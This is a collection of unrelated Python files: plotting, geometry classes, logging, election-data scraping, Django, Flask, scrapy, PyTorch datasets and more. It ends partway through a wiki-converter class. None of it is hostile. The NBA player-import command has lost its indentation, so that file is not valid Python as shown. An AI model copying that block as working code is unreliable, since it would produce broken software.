    fig.colorbar(surf, shrink=0.5, aspect=5)
    # ax.plot_wireframe(xx, yy, probs, rstride=10, cstride=10)
    plt.xlabel('Percentage Zen Decrease')
    plt.ylabel('Percentage Time Decrease')
    plt.title(person)
    ax.set_zlabel('Probability of ZenRoute')
# Show All Graphs at Once
plt.show()
class Problem:
    """A geometry problem: its construction lines/points, prompts and solution."""
    def __init__(self, probId, lines=None, name='test', points=None,
                 problemType='plot', prompts=None, solution=None, text='',
                 probType='Default'):
        # BUG FIX: lines/points/prompts used mutable default arguments ([]),
        # which are shared by every instance created without them. None
        # sentinels give each instance its own fresh list.
        self.id = probId
        self.lines = [] if lines is None else lines
        self.name = name
        self.points = [] if points is None else points
        self.prompts = [] if prompts is None else prompts
        self.solution = solution
        self.text = text
        # NOTE(review): the problemType parameter is accepted but never stored;
        # self.type comes from probType -- confirm this is intentional.
        self.type = probType
    def __str__(self):
        # "<id>, <solution>" -- same output as the original join-based version.
        return '{}, {}'.format(self.id, self.solution)
    def __repr__(self):
        return str(self)
class Solution:
    """Solution geometry; stringifies to its single answer point."""
    def __init__(self, lines=None, points=None):
        # BUG FIX: mutable default arguments ([]) were shared across instances.
        self.lines = [] if lines is None else lines
        self.points = [] if points is None else points
    def __str__(self):
        # expects only one point for the answer
        return str(self.points[0])
class Point:
    """A named 2-D point; stringifies as 'name (x, y)'."""
    def __init__(self, name, x, y):
        self.name = name
        self.x = x
        self.y = y
    def __str__(self):
        return '{} ({}, {})'.format(self.name, self.x, self.y)
    def __repr__(self):
        return str(self)
class Step:
    """A labelled construction step; stringifies to its label."""
    def __init__(self, label, name, op, problemId=0, state=None):
        self.label = label
        self.name = name
        # print(op)
        self.op = op
        # problemId is kept to help detect a specific bug
        self.problemId = problemId
        self.state = state
    def __str__(self):
        return ''.join([self.label])
    def __repr__(self):
        return str(self)
class Op:
    """Holds either a distance or an angle for a step (not both)."""
    def __init__(self, distance, angle):
        self.distance = distance
        self.angle = angle
    # Note: biased to return distance; the two should not coexist!
    def __str__(self):
        value = self.distance if self.distance else self.angle
        return str(value) if value else None
class Answer:
    """The final answer's lines and points; stringifies to the points."""
    def __init__(self, lines, points):
        # BUG FIX: 'self.lines = lines,' (stray trailing comma) wrapped the
        # value in a one-element tuple; callers got (lines,) instead of lines.
        self.lines = lines
        self.points = points
    def __str__(self):
        return str(self.points)
    def __repr__(self):
        return str(self)
|
def longest_unique_substring_length(s):
    """Return the length of the longest substring of *s* with no repeated characters.

    Sliding-window algorithm: `last_seen` maps each character to its most
    recent index; when a repeat falls inside the current window, the window
    start jumps to just past the previous occurrence.

    BUG FIXES vs. the original script: the input `s` was never defined
    (NameError on import), and the window start was advanced one position
    too far (`inicio = x + 1` where `x` was already last_index + 1).
    """
    last_seen = {}   # character -> index of its last occurrence
    start = 0        # start of the current duplicate-free window
    best = 0         # longest window length seen so far
    for i, ch in enumerate(s):
        if ch in last_seen and last_seen[ch] >= start:
            # Repeat inside the window: restart just past the old occurrence.
            start = last_seen[ch] + 1
        best = max(best, i - start + 1)
        last_seen[ch] = i
    return best
# -*- coding: utf-8 -*-
__author__ = 'Tan Chao'
'''
Python logging module wrapper.
'''
import logging
import logging.handlers as LH
import os
import platform
import sys
import time
import traceback
import types
# Logging Levels
# From high to low
LEVEL_CRITICAL = logging.CRITICAL # 50
LEVEL_ERROR = logging.ERROR # 40
LEVEL_WARNING = logging.WARNING # 30, ==WARN
LEVEL_INFO = logging.INFO # 20
LEVEL_DEBUG = logging.DEBUG # 10
LEVEL_NOTSET = logging.NOTSET # 0
LEVEL_CUSTOME = 5 # define your own level

# handler type (selects what LoggerManager.create_logger builds)
HANDLER_STREAM = 'stream'   # StreamHandler (stderr)
HANDLER_SYSLOG = 'syslog'   # syslog on Linux; falls back to a file elsewhere
HANDLER_FILE = 'file'       # timestamped file under LOG_PATH
HANDLER_CUSTOME = 'custom'  # user-supplied handler factory (sic: 'CUSTOME')

# Logger Config
DATE_FMT = '%Y-%m-%d_%H-%M-%S'  # timestamp format used in log file names
SYSLOG_ADDRESS = '/dev/log'
SYSLOG_FACILITY = LH.SysLogHandler.LOG_LOCAL1
LOG_PATH = 'log' + os.sep
# Fields joined by '-'; '%(tag)s' is substituted textually in create_logger().
FORMATTER = '-'.join(['%(asctime)s', '%(tag)s', '%(name)s', '%(filename)s', '%(levelname)s', '%(message)s'])
def log_traceback_hook(self):
    '''self is logger.
    Log the currently-handled exception's traceback at ERROR level.
    Bound onto logger instances as `log_except` by LoggerManager.create_logger.
    '''
    self.error(traceback.format_exc())

def get_cur_time():
    # Current local time formatted for use in log file names.
    return time.strftime(DATE_FMT)
def method_type(method, instance):
    """Bind *method* to *instance* as a bound method, portably across Py2/Py3."""
    if sys.version_info >= (3, 2):
        # Python 3: MethodType(function, instance)
        return types.MethodType(method, instance)
    # Python 2: MethodType(function, instance, class)
    return types.MethodType(method, instance, instance.__class__)
class LoggerManager(object):
    """Factory/registry for configured loggers; all state is class-level."""
    created_loggers = set()        # names of loggers already configured
    log_level = LEVEL_DEBUG        # level applied to new and existing loggers
    log_handler = HANDLER_STREAM   # handler type create_logger will build
    log_tag = ''                   # substituted into the formatter and file names
    custom_handler = None          # factory used when log_handler == HANDLER_CUSTOME
    @staticmethod
    def get_logger(logger_name):
        '''If the logger is exist, then return it directly.'''
        if logger_name not in LoggerManager.created_loggers:
            LoggerManager.create_logger(logger_name)
        logger = logging.getLogger(logger_name)
        if LoggerManager.log_handler == HANDLER_SYSLOG and platform.system() == 'Linux':
            # Syslog records carry the logger name via the adapter's extra dict.
            logger = logging.LoggerAdapter(logger, {'logger_name': logger_name})
        return logger
    @staticmethod
    def create_logger(logger_name):
        """Configure a new named logger: level, handler and formatter."""
        # create logger
        logger = logging.getLogger(logger_name)
        logger.log_except = method_type(log_traceback_hook, logger) # add a method to logger
        logger.setLevel(LoggerManager.log_level)
        # create handler
        if LoggerManager.log_handler == HANDLER_SYSLOG:
            if platform.system() == 'Linux':
                handler = LH.SysLogHandler(SYSLOG_ADDRESS, facility=SYSLOG_FACILITY)
            else: # Windows, Mac: no /dev/log, fall back to a log file
                handler = logging.FileHandler(LoggerManager.get_filename(), encoding='utf8')
        elif LoggerManager.log_handler == HANDLER_FILE:
            handler = logging.FileHandler(LoggerManager.get_filename(), encoding='utf8')
        elif LoggerManager.log_handler == HANDLER_CUSTOME:
            handler = LoggerManager.custom_handler()
        else:
            handler = logging.StreamHandler()
        # create formatter; the tag is baked into the format string itself
        fmt = FORMATTER.replace('%(tag)s', LoggerManager.log_tag)
        formatter = logging.Formatter(fmt)
        handler.setFormatter(formatter)
        handler.setLevel(LoggerManager.log_level)
        logger.addHandler(handler)
        LoggerManager.created_loggers.add(logger_name)
    @staticmethod
    def get_filename():
        """Timestamped log file path under LOG_PATH."""
        return LOG_PATH + LoggerManager.log_tag + "_" + get_cur_time() + '.log'
    @staticmethod
    def set_log_level(level):
        """Change the level for future AND already-created loggers/handlers."""
        LoggerManager.log_level = level
        for name in LoggerManager.created_loggers:
            logger = logging.getLogger(name)
            logger.setLevel(level)
            for handler in logger.handlers:
                handler.setLevel(level)
    @staticmethod
    def set_log_handler(handler):
        # Affects only loggers created after this call.
        LoggerManager.log_handler = handler
    @staticmethod
    def set_log_tag(log_tag):
        LoggerManager.log_tag = log_tag
    @staticmethod
    def set_custom_handler(handler):
        """Install a zero-argument handler factory and switch to it."""
        LoggerManager.log_handler = HANDLER_CUSTOME
        LoggerManager.custom_handler = handler
class Logger(object):
    """Minimal wrapper exposing a single INFO-level log() method."""
    def __init__(self, logger):
        self.logger = logger
    def log(self, log):
        # Always logs at INFO level; non-str values are %s-formatted.
        self.logger.info('%s' % (log))
def main():
    """Demo/driver: exercises levels, handler switching and traceback logging."""
    LoggerManager.set_log_tag('app')
    LoggerManager.set_log_level(LEVEL_INFO)
    logger = LoggerManager.get_logger('client')
    logger.debug('debug message')  # filtered out at INFO level
    logger.info('info message')
    logger.warn('warn message')  # NOTE: warn() is deprecated in favour of warning()
    logger.error('error message')
    logger.critical('critical message')
    # logger.exception('exception message') # python3 error
    LoggerManager.set_log_level(LEVEL_DEBUG)
    logger.debug('debug message new......')
    loggerWraper = Logger(logger)
    loggerWraper.log('test Logger')
    # Switch handler type; only affects loggers created afterwards.
    LoggerManager.set_log_handler(HANDLER_SYSLOG)
    loggerFile = LoggerManager.get_logger('server')
    loggerFile.info('start ok.')
    try:
        print(1/0)
    except:
        # Demonstrates the log_except hook attached in create_logger().
        logger.log_except()

if __name__ == '__main__':
    main()
|
from rooms import Room
class MyMaze(Room):
    """Walks through a maze of linked Room objects from a start to an exit."""
    def __init__(self, st=None, ex=None):
        # NOTE(review): Room.__init__ is never called -- confirm Room needs no setup.
        self.__start = st      # room the walk begins in
        self.__exit = ex       # room that counts as the exit
        self.__current = st    # room the walker currently occupies
    def getCurrent(self):
        """Return the room the walker is currently in."""
        return self.__current
    def _move(self, neighbor):
        """Shared move helper: step into *neighbor*; False if there is no room."""
        if neighbor is None:
            return False
        self.__current = neighbor
        return True
    def moveNorth(self):
        return self._move(self.getNorth())
    def moveSouth(self):
        return self._move(self.getSouth())
    def moveWest(self):
        return self._move(self.getWest())
    def moveEast(self):
        return self._move(self.getEast())
    def atExit(self):
        """True when the current room is the exit room."""
        if self.__current == self.__exit:
            return True
        else:
            return False
    def reset(self):
        """Return the walker to the start room.

        BUG FIX: this method used '==' (a no-op comparison), so reset()
        silently did nothing; it must assign with '='.
        """
        self.__current = self.__start
|
import socket
import sys
from threading import Thread
from time import sleep
class Session:
    """Minimal TCP client session to a server on 127.0.0.1:10000."""
    def __init__(self):
        self.client1 = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # open socket
    def SocketsConnection(self):
        """Connect to the server; exits the process with status 1 on failure."""
        try:
            self.client1.connect(("127.0.0.1", 10000)) # open connection with the server
        except socket.error as e:
            print("Error creating socket: %s" % e)
            sys.exit(1)
    def SocketCloser(self):
        """Close the underlying socket."""
        self.client1.close()
|
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
import tornado.log
import tornado.autoreload
from mainsrv import app
import logging
import os
import sys

# Serve the WSGI app via Tornado: plain HTTP on :80 with "local" on the
# command line, otherwise HTTPS on :443 forked across all CPU cores.
# NOTE(review): when "local" is absent this prints the literal string "None".
print("\033[92mLOCAL WEB SERVER MODE\033[0m" if "local" in sys.argv else None)
tornado.autoreload.start()
tornado.log.access_log.setLevel(logging.INFO)
if "local" in sys.argv:
    http_server = HTTPServer(WSGIContainer(app))
    os.system('color 0')  # Windows console colour reset for local runs
    http_server.listen(80)
else:
    http_server = HTTPServer(WSGIContainer(app), ssl_options={
        # path to your SSL files
        "certfile": os.path.join("/home/pi/Документы/PEM/certificate.crt"),
        "keyfile": os.path.join("/home/pi/Документы/PEM/private.key"),
    })
    http_server.bind(443)
    http_server.start(0)  # 0 = one process per CPU core
IOLoop.instance().start()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 22 20:54:00 2016
@author: mjguidry
"""
import requests, tempfile

# Download the NH Secretary of State 2012 presidential results workbook.
url='http://sos.nh.gov/WorkArea/DownloadAsset.aspx?id=28313'
resp = requests.get(url)
# NOTE(review): tempfile.tempdir may be None until gettempdir() is called -- confirm.
tempdir=tempfile.tempdir
tmp_file=tempdir+'/temp_nh.xls'
rep_dir='../'
output = open(tmp_file, 'wb')
output.write(resp.content)
output.close()

import xlrd, re
wb=xlrd.open_workbook(tmp_file)
sheets = wb.sheet_names()
results_dict=dict()  # town -> {'county': name, candidate: votes, ...}
cols_dict=dict()     # spreadsheet column index -> candidate key
candidates=['Romney','Obama','Johnson','Goode','Paul','Stein','Scatter']
# Static candidate metadata used when writing the output CSV.
candidate_dict={'Romney':{'name':'Mitt Romney' ,
                          'party':'R',
                          'winner':False},
                'Obama' :{'name':'Barack Obama',
                          'party':'D',
                          'winner':True},
                'Johnson' :{'name':'Gary Johnson',
                            'party':'LIB',
                            'winner':False},
                'Goode':{'name':'Virgil Goode' ,
                         'party':'CON',
                         'winner':False},
                'Paul' :{'name':'Ron Paul',
                         'party':'IND',
                         'winner':False},
                'Stein' :{'name':'Jill Stein',
                          'party':'IND',
                          'winner':False},
                'Scatter' :{'name':'Scatter',
                            'party':'',
                            'winner':False}}
# Walk every sheet: a 'County' header row switches parsing on and maps the
# columns to candidates; the county's 'TOTALS' row switches parsing off.
for sheet in sheets:
    ws = wb.sheet_by_name(sheet)
    start_flag=0  # becomes 1 once a county header has been seen
    stop_flag=0   # becomes 1 once that county's TOTALS row has been seen
    for row in range(ws.nrows):
        if(start_flag==1 and stop_flag==0):
            if('TOTALS' in ws.cell(row,0).value):
                stop_flag=1
            else:
                # Town result row: normalise the name, record per-candidate votes.
                town=ws.cell(row,0).value
                town=re.sub('\s+\Z','',town)   # strip trailing whitespace
                town=re.sub('\*','',town)      # drop footnote asterisks
                results_dict[town]=dict()
                results_dict[town]['county']=county
                for col in range(1,ws.ncols):
                    candidate=cols_dict[col]
                    value=ws.cell(row,col).value
                    if(value=='' or value==' '):
                        results_dict[town][candidate]=0
                    else:
                        results_dict[town][candidate]=int(value)
        try:
            # County header row: remember the county name and map each data
            # column to the candidate whose name appears in its header cell.
            if('County' in ws.cell(row,0).value):
                value=ws.cell(row,0).value
                start_flag=1
                stop_flag=0
                county=re.search('.*(?=\sCounty)',value).group(0)
                for col in range(1,ws.ncols):
                    candidate=[x for x in candidates if x in ws.cell(row,col).value][0]
                    cols_dict[col]=candidate
        except:
            # Bare except by design: non-text cells raise on 'in'; skip them.
            pass
# Debug print statements
# print 'Romney results ', sum([results_dict[x]['Romney'] for x in results_dict.keys()])
# print 'Obama results ', sum([results_dict[x]['Obama'] for x in results_dict.keys()])

# Clean up multiple wards into one set of results per town:
# sum each candidate's votes over the town's wards, then drop the ward rows.
wards=[x for x in results_dict.keys() if 'Ward' in x]
towns=set([re.search('.*(?=\sWard)',x).group(0) for x in wards])
for town in towns:
    results_dict[town]=dict()
    town_wards=[x for x in wards if town in x]
    county=results_dict[town_wards[0]]['county']
    results_dict[town]['county']=county
    for candidate in candidates:
        results_dict[town][candidate]=sum([results_dict[x][candidate] for x in town_wards])
    for ward in town_wards:
        del results_dict[ward]

import csv
# NOTE: 'wb' mode with the csv module implies Python 2.
csvfile=open(rep_dir+'/20121106__nh__general__president__town.csv','wb')
csvwriter=csv.writer(csvfile)
csvwriter.writerow(['town',
                    'county',
                    'office',
                    'district',
                    'party',
                    'candidate',
                    'winner',
                    'votes'])
# One row per (candidate, town), towns sorted alphabetically.
for candidate in candidates:
    for town in sorted(results_dict.keys()):
        csvwriter.writerow([town,
                            results_dict[town]['county'],
                            'President',
                            '',
                            candidate_dict[candidate]['party'],
                            candidate_dict[candidate]['name'],
                            candidate_dict[candidate]['winner'],
                            results_dict[town][candidate]
                            ])
csvfile.close()

import pickle
# Persist the town -> county mapping for reuse by other scripts.
county_dict=dict()
for town in sorted(results_dict.keys()):
    county_dict[town]=results_dict[town]['county']
f=open('county.pkl','wb')
pickle.dump(county_dict,f)
f.close()
|
# Generated by Django 2.0.7 on 2018-07-30 11:39
from django.db import migrations, models


class Migration(migrations.Migration):
    """Adds an optional free-text 'comment' field to the Comment model
    (generated migration; do not edit beyond comments)."""
    dependencies = [
        ('post_app', '0007_auto_20180730_1433'),
    ]
    operations = [
        migrations.AddField(
            model_name='comment',
            name='comment',
            field=models.CharField(blank=True, default='', max_length=250),
        ),
    ]
|
# test 1
# Dog class
class Dog:
    """A simple dog with a name, an age, and a mutable color."""
    def __init__(self, name, age):
        # __init__ runs on every instantiation and sets the attributes.
        self.name = name
        self.age = age
        self.color = 'yellow'  # default attribute value
    def sit(self):
        print(f"{self.name.title()} now is sitting.")
    def roll_over(self):
        print(f"{self.name.title()} roll over.")
    def message(self):
        print(f"{self.name} is {self.age} years old and it's color is {self.color}")
    def update_color(self, color):
        """Setter-style helper for changing the dog's color."""
        self.color = color
# Instantiate
my_dog = Dog('willim', 6)
# Access attributes
print(my_dog.name + " is " + str(my_dog.age))
# Call methods
my_dog.sit()
my_dog.roll_over()
my_dog.message()

# test 2
# Modify an attribute: directly, or through the helper method.
my_dog.color = 'blue'
my_dog.message()
my_dog.update_color('black')
my_dog.message()
|
#coding=utf-8
import os
import sys
import logging
from scrapy.crawler import CrawlerProcess
from scrapy.utils.log import configure_logging
from scrapy.utils.project import get_project_settings
def run(name):
    """Run the spider called *name*, logging everything to log/<name>.log."""
    configure_logging(install_root_handler = False)
    # ROBUSTNESS FIX: basicConfig raises FileNotFoundError if the log
    # directory does not exist yet.
    os.makedirs('log', exist_ok=True)
    logging.basicConfig(
        filename = 'log/%s.log' % name,
        # BUG FIX: '%(message) s' (stray space) -> '%(message)s'
        format = '%(levelname)s %(asctime)s: %(message)s',
        level = logging.DEBUG
    )
    process = CrawlerProcess(get_project_settings())
    try:
        logging.info('run start spider: %s' % name)
        process.crawl(name)
        process.start()
    except Exception as e:
        logging.error('run spider: %s exception: %s' % (name, e))
def main():
    """Alternative driver using scrapy's cmdline helper.

    NOTE(review): cmdline.execute() does not normally return (it exits the
    process), so the second call is likely unreachable -- confirm.
    """
    from scrapy import cmdline
    cmdline.execute("scrapy crawl douban_music".split())
    cmdline.execute("scrapy crawl douban_video".split())
if __name__ == '__main__':
    # BUG FIX: 'sys.argv[1] or "demo"' raised IndexError when no argument
    # was given -- 'or' only handles falsy values, not a missing element.
    name = sys.argv[1] if len(sys.argv) > 1 else 'demo'
    print('name: %s' % name)
    print('project dir: %s' % os.getcwd())
    run(name)
|
# Distribution metadata for the vivarium_public_health package.
__all__ = [
    "__title__", "__summary__", "__uri__", "__version__", "__author__",
    "__email__", "__license__", "__copyright__",
]

__title__ = "vivarium_public_health"
__summary__ = "Components for modelling diseases, risks, and interventions with ``vivarium``"
__uri__ = "https://github.com/ihmeuw/vivarium_public_health"
__version__ = "0.10.14"
__author__ = "The vivarium_public_health developers"
__email__ = "vivarium.dev@gmail.com"
__license__ = "BSD-3-Clause"
__copyright__ = f"Copyright 2021 {__author__}"
|
import os
import random
import string
from bitcoin_acks.database.session import get_url
def generate_secret():
    """Return a random 32-character alphanumeric secret for use as a Flask
    SECRET_KEY.

    SECURITY FIX: ``random`` is not a cryptographically secure PRNG; use
    ``secrets.choice`` for anything security-sensitive like session keys.
    """
    import secrets  # local import: CSPRNG-backed choice
    alphanumeric = string.ascii_uppercase + string.ascii_lowercase + string.digits
    return ''.join(secrets.choice(alphanumeric) for _ in range(32))
class Config(object):
    """Flask application configuration."""
    DEBUG = False
    FLASK_ADMIN_FLUID_LAYOUT = True
    # NOTE(review): generate_secret() is evaluated eagerly even when the
    # SECRET_KEY env var is set, and a fresh random key per process will
    # invalidate sessions on every restart -- confirm this is intended.
    SECRET_KEY = os.environ.get('SECRET_KEY', default=generate_secret())
    SQLALCHEMY_DATABASE_URI = get_url()
    SQLALCHEMY_TRACK_MODIFICATIONS = False
|
import os
import typing
from enum import Enum
import boto3
class CloudwatchHandler:
    """Publishes custom CloudWatch metrics under a deployment-specific namespace.

    Requires the DEPLOYMENT_ENV and AWS_DEFAULT_REGION environment variables.
    """
    def __init__(self):
        # e.g. "dcp-wide-test-dev" for DEPLOYMENT_ENV=dev
        self.namespace = f"dcp-wide-test-{os.environ['DEPLOYMENT_ENV']}"
        self._client = boto3.client("cloudwatch", region_name=os.environ['AWS_DEFAULT_REGION'])
    def put_metric_data(self,
                        metric_name,
                        metric_value):
        """
        Puts a cloudwatch metric data point
        :param metric_name: The name of the metric to put
        :param metric_value: value of metric to put
        """
        metric_data = {
            'MetricName': metric_name,
            'Value': metric_value
        }
        self._client.put_metric_data(MetricData=[metric_data], Namespace=self.namespace)
|
import pandas
import cv2
from glob import iglob
import os
'''
This script will list full path for training set indexing (ls command not working when list too long, need sequential approach)
'''
# NOTE(review): the train paths below are immediately overwritten by the val
# paths, so only val.txt is ever produced -- kept as-is pending confirmed intent.
source = 'data-cleaning/dataset/crowdhuman-coco-yolo/images/train/'
# make sure destination is empty
destination = 'data-cleaning/dataset/crowdhuman-coco-yolo/train.txt'

source = 'data-cleaning/dataset/crowdhuman-coco-yolo/images/val/'
# make sure destination is empty
destination = 'data-cleaning/dataset/crowdhuman-coco-yolo/val.txt'

count = 0
# PERFORMANCE FIX: open the output file once instead of re-opening (and
# re-seeking to the end in append mode) for every single image path.
with open(destination, 'a') as out:
    for filename in sorted(iglob(source + '*.jpg')):
        count += 1
        #if count%10 == 0:
        print(count)
        out.write(filename + '\n')
        #break
|
from django.core.files.base import ContentFile
from django.core.management.base import BaseCommand
import requests
import kronos
from nba_py.player import PlayerList, PlayerGeneralSplits
from players.models import Player
from teams.models import Team
from seasons.models import Season, PlayerSeason
@kronos.register('0 0 * * *') # Once a day
class Command(BaseCommand):
help = 'Add/update all NBA players from current season'
def add_arguments(self, parser):
    """Register the --skip flag: when set, players already in the DB are not updated."""
    parser.add_argument(
        '--skip',
        action='store_true',
        dest='skip',
        default=False,
        help='Skip existing players',
    )
def handle(self, *args, **options):
all_players = PlayerList().info()
for api_player in all_players:
info_msg = "'{} ({})'".format(
api_player['DISPLAY_FIRST_LAST'],
api_player['PERSON_ID']
)
# Get the player, or create him if doesn't exist
qs = Player.objects.filter(PERSON_ID=api_player['PERSON_ID'])
if qs.exists():
if options['skip']:
self.stdout.write(
self.style.SUCCESS("Skipping " + info_msg)
)
continue
player = qs[0]
self.stdout.write(self.style.SUCCESS("Updating " + info_msg))
else:
player = Player()
self.stdout.write(self.style.SUCCESS("Adding " + info_msg))
try:
name = api_player['DISPLAY_LAST_COMMA_FIRST']
last, first = name.replace(' ', '').split(',', 1)
except ValueError:
# Only one name
first = api_player['DISPLAY_LAST_COMMA_FIRST']
last = ''
player.first_name = first
player.last_name = last
player.PERSON_ID = api_player['PERSON_ID']
player.PLAYERCODE = api_player['PLAYERCODE']
# Add player photo only on creation
if not player.photo:
base_url = ('http://i.cdn.turner.com/nba/nba/.element/'
'img/2.0/sect/statscube/players/large/')
filename = api_player['PLAYERCODE'] + '.png'
photo_url = base_url + filename
# Try three times
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=3)
session.mount('http://', adapter)
response = session.get(photo_url)
if response:
image_content = ContentFile(response.content)
player.photo.save(filename, image_content)
player.save()
# Player current season
try:
player_stats = PlayerGeneralSplits(
api_player['PERSON_ID']
).overall()[0]
except IndexError:
self.stdout.write(self.style.ERROR("No stats for " + info_msg))
continue
season, __ = Season.objects.get_or_create(
abbr=player_stats['GROUP_VALUE'],
)
qs = PlayerSeason.objects.filter(
player=player, season=season,
)
if qs.exists():
player_season = qs[0]
else:
player_season = PlayerSeason()
# Team
if api_player['TEAM_ID'] and api_player['TEAM_CODE']:
team = Team.objects.get(TEAM_ID=api_player['TEAM_ID'])
else:
# Player played this season, but was cut/moved to D-League
team = None
player_season.team = team
player_season.player = player
player_season.season = season
player_season.ROSTERSTATUS = api_player['ROSTERSTATUS']
player_season.GAMES_PLAYED_FLAG = api_player['GAMES_PLAYED_FLAG']
player_season.pts = player_stats['PTS']
player_season.reb = player_stats['REB']
player_season.ast = player_stats['AST']
player_season.stl = player_stats['STL']
player_season.blk = player_stats['BLK']
player_season.fg_pct = player_stats['FG_PCT']
player_season.fg3_pct = player_stats['FG3_PCT']
player_season.ft_pct = player_stats['FT_PCT']
player_season.save()
self.stdout.write(self.style.SUCCESS("Successfully updated players"))
|
import torch
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pad_sequence
import json
from tqdm import tqdm
from collections import defaultdict
import random
def load_data(path):
    """Lazily yields one parsed JSON object per line of a JSON-lines file."""
    with open(path, 'r') as handle:
        for raw_line in handle:
            yield json.loads(raw_line)
def get_data(data, numericalizer, fields):
    """Drops every field not in `fields` from each record, numericalizes the
    remainder, and returns the processed records as a list."""
    processed = []
    for datum in tqdm(data, desc='Creating dataset...'):
        # Snapshot the keys so deletion during iteration is safe.
        for key in set(datum.keys()):
            if key not in fields:
                del datum[key]
        processed.append(numericalizer(datum))
    return processed
def categorical_accuracy(prediction, label):
    """Returns the fraction of rows whose argmax class equals the label,
    as a 1-element float tensor."""
    predicted_classes = prediction.argmax(dim=1, keepdim=True).squeeze(1)
    num_correct = predicted_classes.eq(label).sum()
    return num_correct / torch.FloatTensor([label.shape[0]])
def categorical_tag_accuracy(predictions, tags, tag_pad_idx):
    """Returns argmax accuracy computed only over non-padding tag positions,
    as a 1-element float tensor."""
    max_preds = predictions.argmax(dim=1, keepdim=True)
    # Indices of positions whose tag is not the padding index.
    keep = (tags != tag_pad_idx).nonzero()
    matches = max_preds[keep].squeeze(1).eq(tags[keep])
    return matches.sum() / torch.FloatTensor([tags[keep].shape[0]])
class TextDataset(Dataset):
    """Map-style dataset of numericalized JSON-lines records."""

    def __init__(self, path, tokenizer, fields):
        """Loads `path` (JSON lines), keeps only `fields`, and numericalizes
        each record with the tokenizer."""
        self.tokenizer = tokenizer
        self.fields = fields
        self.data = get_data(load_data(path), tokenizer.numericalize, fields)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, idx):
        return self.data[idx]

    def collate(self, batch):
        """Pads vocab fields into (seq, batch) LongTensors plus a
        `<field>_lengths` entry; other fields become 1-D LongTensors.
        All tensors are moved to the GPU."""
        collected = defaultdict(list)
        for example in batch:
            for key in example.keys():
                if key in self.tokenizer.vocabs:
                    collected[key].append(torch.LongTensor(example[key]))
                    collected[key + '_lengths'].append(len(example[key]))
                else:
                    collected[key].append(example[key])
        for key, values in collected.items():
            if key in self.tokenizer.vocabs:
                vocab = self.tokenizer.vocabs[key]
                pad_idx = vocab.stoi[vocab.pad_token]
                collected[key] = pad_sequence(values,
                                              padding_value=pad_idx).cuda()
            else:
                collected[key] = torch.LongTensor(values).cuda()
        return collected
class MaskDataset(Dataset):
    """Map-style dataset that serves numericalized JSON-lines records and,
    at collate time, masks one random token per vocab field for
    masked-token prediction."""

    def __init__(self, path, tokenizer, fields):
        """Loads `path` (JSON lines), keeps only `fields`, and numericalizes
        each record with the tokenizer."""
        self.tokenizer = tokenizer
        self.fields = fields
        data_iter = load_data(path)
        self.data = get_data(data_iter, tokenizer.numericalize, fields)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, idx):
        return self.data[idx]

    def collate(self, batch):
        """Collates a batch, replacing one random token per vocab field with
        '<mask>' and recording the original token as the target.

        Returns a dict with, per vocab field: the padded (seq, batch)
        LongTensor, `<field>_lengths`, and `<field>_mask` (the masked-out
        tokens). Non-vocab fields become 1-D LongTensors. All tensors are
        moved to the GPU.
        """
        batch_data = defaultdict(list)
        for item in batch:
            for field in item.keys():
                if field in self.tokenizer.vocabs:
                    assert '<mask>' in self.tokenizer.vocabs[field].stoi
                    mask_idx = self.tokenizer.vocabs[field].stoi['<mask>']
                    # BUG FIX: mask a copy of the token list. The original
                    # code mutated the stored example in place, so items
                    # stayed masked across epochs and the recorded target
                    # could itself be a leftover '<mask>' token.
                    tokens = list(item[field])
                    mask_pos = random.randint(0, len(tokens) - 1)
                    masked_token = tokens[mask_pos]
                    tokens[mask_pos] = mask_idx
                    batch_data[field].append(torch.LongTensor(tokens))
                    batch_data[field + '_lengths'].append(len(tokens))
                    batch_data[field + '_mask'].append(masked_token)
                else:
                    batch_data[field].append(item[field])
        for field, values in batch_data.items():
            if field in self.tokenizer.vocabs:
                pad_token = self.tokenizer.vocabs[field].pad_token
                pad_idx = self.tokenizer.vocabs[field].stoi[pad_token]
                batch_data[field] = pad_sequence(values,
                                                 padding_value=pad_idx).cuda()
            else:
                batch_data[field] = torch.LongTensor(values).cuda()
        return batch_data
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles conversion of Wiki files."""
import urlparse
from . import constants
class Converter(object):
    """Class that handles the actual parsing and generation."""

    # A map of HTML tags to a list of the supported args for that tag.
    _BASIC_HTML_ARGS = ["title", "dir", "lang"]
    _BASIC_HTML_SIZEABLE_ARGS = (_BASIC_HTML_ARGS +
        ["border", "height", "width", "align"])
    _BASIC_HTML_TABLE_ARGS = (_BASIC_HTML_SIZEABLE_ARGS +
        ["valign", "cellspacing", "cellpadding"])
    # Whitelist of HTML tags that pass through the converter, each mapped to
    # the attributes preserved on output.
    _ALLOWED_HTML_TAGS = {
        "a": _BASIC_HTML_ARGS + ["href"],
        "b": _BASIC_HTML_ARGS,
        "br": _BASIC_HTML_ARGS,
        "blockquote": _BASIC_HTML_ARGS,
        "code": _BASIC_HTML_ARGS + ["language"],
        "dd": _BASIC_HTML_ARGS,
        "div": _BASIC_HTML_ARGS,
        "dl": _BASIC_HTML_ARGS,
        "dt": _BASIC_HTML_ARGS,
        "em": _BASIC_HTML_ARGS,
        "font": _BASIC_HTML_ARGS + ["face", "size", "color"],
        "h1": _BASIC_HTML_ARGS,
        "h2": _BASIC_HTML_ARGS,
        "h3": _BASIC_HTML_ARGS,
        "h4": _BASIC_HTML_ARGS,
        "h5": _BASIC_HTML_ARGS,
        "i": _BASIC_HTML_ARGS,
        "img": _BASIC_HTML_SIZEABLE_ARGS + ["src", "alt"],
        "li": _BASIC_HTML_ARGS,
        "ol": _BASIC_HTML_ARGS + ["type", "start"],
        "p": _BASIC_HTML_ARGS + ["align"],
        "pre": _BASIC_HTML_ARGS,
        "q": _BASIC_HTML_ARGS,
        "s": _BASIC_HTML_ARGS,
